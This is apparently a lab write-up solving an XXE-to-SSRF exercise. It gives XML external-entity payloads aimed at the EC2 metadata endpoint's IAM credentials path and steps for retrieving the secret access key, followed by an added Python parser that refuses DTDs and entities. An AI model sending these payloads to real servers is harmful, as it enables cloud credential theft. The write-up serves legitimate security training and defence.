Problem Statement

This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.


Felix

Solution

Initial payload = <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>

1. Try injecting initial payload, and access via &xxe; as per previous lab
2. Iteratively visit /latest /meta-data / ...
3. Get the access key

Proof


What have you learnt?

  1. http://169.254.169.254/ is the default metadata URL. https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html

Chensan
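
A defensive counterpart to the payload in the solution above, added here and not part of the original write-up: a stock-check parser that refuses any DOCTYPE or entity declaration, so no entity URL is ever resolved. The element names `stockCheck`, `productId` and `storeId` and both sample requests are assumptions constructed for illustration.

```python
import xml.parsers.expat

# Constructed sample requests; the element names are assumptions.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>'
          b'<stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>')
PAGE_PAYLOAD = (b'<?xml version="1.0" encoding="UTF-8"?>'
                b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>'
                b'<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>')


class UnsafeXML(ValueError):
    """Raised when a request carries a DTD or entity declaration."""


def parse_stock_check(body: bytes) -> dict:
    """Parse a stock-check request, refusing any DOCTYPE or entity use."""
    fields, stack, text = {}, [], []

    def forbid(kind):
        def handler(*_args):
            raise UnsafeXML(f"{kind} not allowed in stock-check requests")
        return handler

    def start(name, _attrs):
        stack.append(name)
        text.clear()

    def end(name):
        # Only leaf elements directly under the root carry values.
        if len(stack) == 2:
            fields[name] = "".join(text).strip()
        stack.pop()
        text.clear()

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid("DOCTYPE")
    parser.EntityDeclHandler = forbid("entity declaration")
    parser.ExternalEntityRefHandler = forbid("external entity")
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)

    # The lab reflects unexpected values in its response; accept only
    # integers and never echo the raw input back to the client.
    try:
        return {k: int(fields[k]) for k in ("productId", "storeId")}
    except (KeyError, ValueError):
        raise ValueError("productId and storeId must be integers") from None
```

Malformed XML still raises `xml.parsers.expat.ExpatError`, which the caller should map to a generic 400 response.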